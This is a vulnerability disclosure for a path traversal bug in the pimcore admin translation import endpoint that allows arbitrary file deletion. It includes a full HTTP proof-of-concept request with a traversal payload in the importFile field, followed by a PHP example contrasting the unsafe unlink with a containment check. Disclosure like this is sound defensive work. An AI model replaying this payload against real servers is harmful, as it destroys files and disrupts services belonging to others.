CVE-2022-0665: Path Traversal in pimcore

Path Traversal in GitHub repository pimcore/pimcore prior to 10.3.2.


Description

The application does not perform any check or filter on the value of the "importFile" parameter at the endpoint "/admin/translation/import". Once the import has run, the PHP unlink function proceeds to delete the file at that path.

Proof of Concept

  • Step 1: Log in as admin at https://10.x-dev.pimcore.fun/admin.

  • Step 2: Use Burp Suite to proxy the request. Go to Settings -> Admin Translations -> Import & Merge CSV.

  • Step 3: Edit the value of importFile in the request to /admin/translation/import:

    POST /admin/translation/import?merge=2 HTTP/1.1
    Host: 10.x-dev.pimcore.fun
    Cookie: pimcore_admin_sid=1; _pc_tss=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE2NDQ0ODI4MjMuODk3MTExLCJwdGciOnsiX20iOjEsIl9jIjoxNjQ0NDgxMjAxLCJfdSI6MTY0NDQ4MjgyMywidmk6c3J1IjpbN119LCJleHAiOjE2NDQ0ODQ2MjN9.0Ezd501szQiJryBsTcmEajyE0cKw3Jy0D7vnaIi0f7M; _pc_tvs=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE2NDQ0ODI4MjMuODk3MjE4LCJwdGciOnsiY21mOnNnIjp7Ijg2MCI6MX0sIl9jIjoxNjQ0NDgxMjAyLCJfdSI6MTY0NDQ4MTIwMn0sImV4cCI6MTY3NjAxODgyM30.QVPovPchi8Amu7U6HfloyPzaqWM9raWqTr8WyaODiHU; _pc_vis=bdd4fff7d63cd197; _pc_ses=1644481631796; _ga=GA1.4.1223340938.1644481632; _gid=GA1.4.1727336840.1644481632; PHPSESSID=8ec8b25fc8744112040d525dc3a0cff0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
    Accept: */*
    Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: https://10.x-dev.pimcore.fun/admin/?_dc=1644481466&perspective=
    X-Pimcore-Csrf-Token: 3940b07522d199209cfd8b6083f0959e0f907449
    X-Pimcore-Extjs-Version-Major: 7
    X-Pimcore-Extjs-Version-Minor: 0
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 263
    Origin: https://10.x-dev.pimcore.fun
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    Te: trailers
    Connection: close

    importFile=…/…/…/…/…/…/…/…/…/var/www/html/vendor/pimcore/pimcore/lib/Model/AbstractModel.php&csvSettings={"delimiter":":","escapechar":"\","lineterminator":"\n","quotechar":"""}&domain=admin&delimiter=%3a&escapechar=%5C&lineterminator=%0a&quotechar=%22

  • Step 4: Log out and go to https://10.x-dev.pimcore.fun/admin; you will see the error "Failed opening '/var/www/html/vendor/composer/…/pimcore/pimcore/lib/Model/AbstractModel.php' for inclusion". Sorry for my mistake; can you revert https://10.x-dev.pimcore.fun?

  • PoC:

https://drive.google.com/file/d/17EtF8I3ChKL14uDxaelBa0GLeHq6APjy

https://drive.google.com/file/d/1JnffQheSMgnKeAaQjYQxMHxDwCS3UA80

Root cause:

  • Path traversal: https://github.com/pimcore/pimcore/blob/master/bundles/AdminBundle/Controller/Admin/TranslationController.php#L71

  • File delete: https://github.com/pimcore/pimcore/blob/master/bundles/AdminBundle/Controller/Admin/TranslationController.php#L95
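As an added example (not pimcore's code and not the fix the project shipped), the unchecked delete described above is shown beside a containment check that resolves the supplied name against the upload directory before anything is unlinked; the directory layout and function names are assumptions:

```php
<?php
// Added example, not pimcore's code: the unchecked pattern described above
// beside a containment check that runs before unlink(); names are assumed.
// Vulnerable pattern: the client-controlled "importFile" value reaches
// unlink() as-is, so "../" segments walk out of the upload directory.
function deleteImportFileUnsafe(string $importFile): bool
{
    return unlink($importFile);
}
// Hardened pattern: accept only a bare file name, resolve it against the
// upload directory with realpath(), and require the canonical result to sit
// directly inside that directory. Returns the safe absolute path or null.
function resolveImportFile(string $baseDir, string $importFile): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // The import only needs a name the upload handler generated itself,
    // so any directory component (including "..") is rejected outright.
    if ($importFile === '' || basename($importFile) !== $importFile) {
        return null;
    }
    $target = realpath($base . DIRECTORY_SEPARATOR . $importFile);
    // realpath() follows symlinks, so a link planted in the upload directory
    // that points elsewhere fails the parent-directory comparison.
    if ($target === false || dirname($target) !== $base || !is_file($target)) {
        return null;
    }
    return $target;
}

function deleteImportFileSafe(string $baseDir, string $importFile): bool
{
    $target = resolveImportFile($baseDir, $importFile);
    if ($target === null) {
        throw new InvalidArgumentException('importFile must be a file inside the import directory');
    }
    return unlink($target);
}

// Demonstration on a constructed upload directory under the system temp dir.
$uploads = sys_get_temp_dir() . '/import-demo-' . bin2hex(random_bytes(4));
mkdir($uploads, 0700);
file_put_contents($uploads . '/translations.csv', "key:value\n");
$ok = resolveImportFile($uploads, 'translations.csv') !== null
    && resolveImportFile($uploads, '../../../../etc/hostname') === null
    && deleteImportFileSafe($uploads, 'translations.csv');
rmdir($uploads);
echo $ok ? "containment check behaves as expected\n" : "unexpected result\n";
```

Rejecting anything with a directory component is the simplest check; the realpath comparison is the defence in depth for symlinks left in the upload directory.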

Impact

An attacker can delete any file on the server (whether a given deletion succeeds depends on the permissions of the user account the web service runs as).
